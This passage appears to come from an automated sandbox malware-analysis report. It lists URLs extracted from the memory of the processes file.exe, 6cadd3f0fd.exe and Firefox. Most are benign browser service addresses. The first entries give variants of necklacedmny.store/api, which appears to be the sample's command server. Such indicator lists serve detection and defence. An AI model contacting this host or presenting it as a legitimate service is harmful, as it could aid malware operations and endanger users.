Source: 6cadd3f0fd.exe, 0000000D.00000003.2716729398.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2658132730.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2689945232.000000000109D000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2628157062.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2604592172.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2628798588.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api
Source: 6cadd3f0fd.exe, 00000009.00000003.2557653647.0000000000792000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2557372250.000000000078F000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2732085528.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2547569165.0000000000794000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api-
Source: 6cadd3f0fd.exe, 00000009.00000003.2732085528.0000000000793000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiA
Source: 6cadd3f0fd.exe, 0000000D.00000003.2688087863.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2687309594.00000000010DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiF
Source: file.exe, 00000000.00000003.1845555563.000000000115F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiI
Source: file.exe, 00000000.00000003.1844921816.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1845532345.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1845244184.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiOpjzCuI8nqza2hkp8xe/v7rM
Source: 6cadd3f0fd.exe, 0000000D.00000003.2628157062.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2628798588.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api_
Source: 6cadd3f0fd.exe, 0000000D.00000003.2628157062.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2604592172.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2628798588.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apidr
Source: 6cadd3f0fd.exe, 0000000D.00000003.2658132730.00000000010C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apis
Source: file.exe, 00000000.00000003.1844921816.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1845532345.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1845244184.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apix1P
Source: 6cadd3f0fd.exe, 0000000D.00000003.2689945232.0000000001066000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/za
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001B.00000003.2599955209.000001C172133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2755914976.000001C172139000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C17268F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001B.00000003.2599955209.000001C172133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2742669039.000001C17097D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2755914976.000001C172139000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C17268F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/FileUtils.sys.mjsisDownloadsImprovemen
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://probeinfo.telemetry.mozilla.org/glean/repositories.
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.comto-handle-default-browser-agent
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001B.00000003.2596897657.000001C174600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/Unexpected
Source: firefox.exe, 0000001B.00000002.2744766730.000001C170CD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.comP
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2784200598.000001C175003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2784200598.000001C175003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B797012000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001B.00000003.2680870116.000001C1770FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2785119034.000001C1752E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B797086000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsSHUTDOWN_PHASE_DURATION_TICKS_PROFILE_BEFORE_CHANGE
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2780914101.000001C174E6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: file.exe, 00000000.00000003.1681259671.0000000005A6E000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454420514.00000000052D0000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2583715092.00000000058B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001B.00000003.2679591143.000001C177478000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001B.00000002.2785119034.000001C175299000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 6cadd3f0fd.exe, 0000000D.00000003.2638368744.0000000005973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 0000001B.00000003.2699335815.000001C1775A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2717941008.000001C1775A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001B.00000003.2679591143.000001C177478000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: 6cadd3f0fd.exe, 0000000D.00000003.2638368744.0000000005973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1681333174.0000000005A65000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1681259671.0000000005A6C000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454420514.00000000052CE000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2583715092.00000000058B1000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2585195417.00000000058AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000003.1681333174.0000000005A40000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2585195417.0000000005885000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000000.00000003.1681333174.0000000005A65000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1681259671.0000000005A6C000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454420514.00000000052CE000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2583715092.00000000058B1000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2585195417.00000000058AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000003.1681333174.0000000005A40000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2585195417.0000000005885000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
